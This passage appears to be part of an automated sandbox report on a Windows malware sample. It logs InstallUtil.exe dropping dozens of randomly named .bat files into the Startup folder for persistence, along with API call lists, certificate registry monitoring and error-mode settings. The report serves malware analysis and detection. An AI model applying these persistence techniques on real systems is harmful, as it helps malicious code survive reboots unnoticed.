                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jaUbcEKacTPqo4Q1E5vfMGYC.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XwXewTdG4i3reg1W4KZwDkqE.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3bJmXHWxFTLdtjfcK2Eo1CEB.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LzSfFK21XHlma9f2nC93iWKZ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jeY2PypT42qBGgOqmE9VOHfI.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HSU3kmKANUWIev2Y6XGUJn4z.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ftO6ibAWBETsFr4PHO0HWyVm.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T3nGwYe0ke53Bm81uF54Won2.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5wb8yM8aV9uA3MWk0nQDV6N.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JLskMOTKdJylvoD4fywb2xq9.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KCLvXEQADdAafKsEPtvKcJuW.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7CPf1BbnKQFsIHTCUVgPW2b1.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d78Ytvj4V0ta2ZiqFQElQpre.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nJ0fjaFyPdUTkd27RbJpgLbV.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tUicDr528bg57zTahAKCbWLd.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kJdsA9VA9hS9yUHHqg0ft5DV.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JqwWbmZjvUESTxkLyujvgfQ5.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFEgarK2CmFukpJoHmXp7Y8A.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zo8clGYvUOyWdFarhfpUgMEN.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pqQfoi3HoiRfRwXXSLOFIGm.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mQAC01IWkyy1VpnNHreKqDP9.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rxQ6BYkPciRzcYhkKHNbCVXz.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klA8JmAQ7d3aYJKSY8AQnRqN.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vM0i9O3SmyJMeySMU7pfuQYS.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o9mC5xW9tKlp4kRcY0ENXFVx.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QDBulKT4KjP0Dmav2rPCTbex.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suhoeipyv9Q7WtMqEht6w8l1.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OtXKtregFQf6WT1poKNUeJKH.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JvJ8FkMpNTNcNAQ5IZH9OyrC.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aJ5ZzPIw4W4iDW4JiJvEgRVK.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n5FvfFJp0xTBHsTUd1HtVjgf.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYIEdBWtHabBbSeILpT9tflf.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E5vcf50a1xrNZPss2hqKnW2D.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NRkNthlWHWKfvzr3Huo2Hk96.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aJ4M3BmSoFSfJVoorcfM8Tu.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aRQMhYcR0xLeNlVzNud4PjhM.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zu88srVplDcE4JudkCIsfMfK.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3GBEpW1FZQUrWvbMjKRmSlSD.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mYqDdzubQoYo0UMqzcaWhlCq.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ocJg40zsLJKmhTN6I8MsqjRk.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2qieftJz22U9uS3rPyIxFMCy.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqYgLbwNH1rp6de2WyF5QSu3.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V38rH4DyBbWszXs0VbJ310hH.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIcfPToLUPq3gj5WqJxRDBbR.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WbZbZUFbJRp9V9DhX6D6SbsF.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X3kzXxi5tUUbK9D3UM8FR6yB.batJump to behavior
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,15_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,15_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004241DC IsIconic,SetActiveWindow,SetFocus,15_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00424194 IsIconic,SetActiveWindow,15_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,15_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,15_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00417598 IsIconic,GetCapture,15_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,15_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00417CCE IsIconic,SetWindowPos,15_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,15_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,15_2_0041F118
                    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
